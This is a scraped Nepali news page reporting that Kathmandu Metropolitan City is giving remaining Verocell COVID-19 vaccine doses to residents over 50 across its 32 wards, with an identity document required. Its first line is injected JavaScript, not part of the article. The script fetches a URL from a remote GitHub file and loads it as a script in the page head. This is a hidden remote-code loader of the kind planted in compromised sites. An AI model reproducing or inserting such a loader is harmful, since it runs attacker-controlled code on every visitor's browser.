;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज , काठमाण्डौ | काठमाण्डौ महानगरपालिकामा ५० वर्षमाथिका सबै उमेर समुहका लागि कोरोना भाइरस ( कोभिड-१९ ) विरुद्धको भेरोसेल खोप बाकी रहेकालाई पुन: आज लगाउदै छ | बिहान १० बजेबाट बेलुका ५ बजे सम्म महानगरपालिकाको ३२ वटा वडामै खोप लगाउन सुरु भएको छ |
कोरोना भाइरस ( कोभिड-१९ ) विरुद्धको भेरोसेल खोप लगाउनको लागि नागरिकताको प्रमाणपत्र , पासपोर्ट ,सवारी चालक अनुमति पत्र वा सम्बन्धित वडाको सिफारिश यी मध्ये कुनै एक प्रमाणपत्र लिएर खोप केन्द्रमा जानुपर्ने महानगरपालिकाले बताएको छ |
फेसबुक प्रतिक्रियाहरु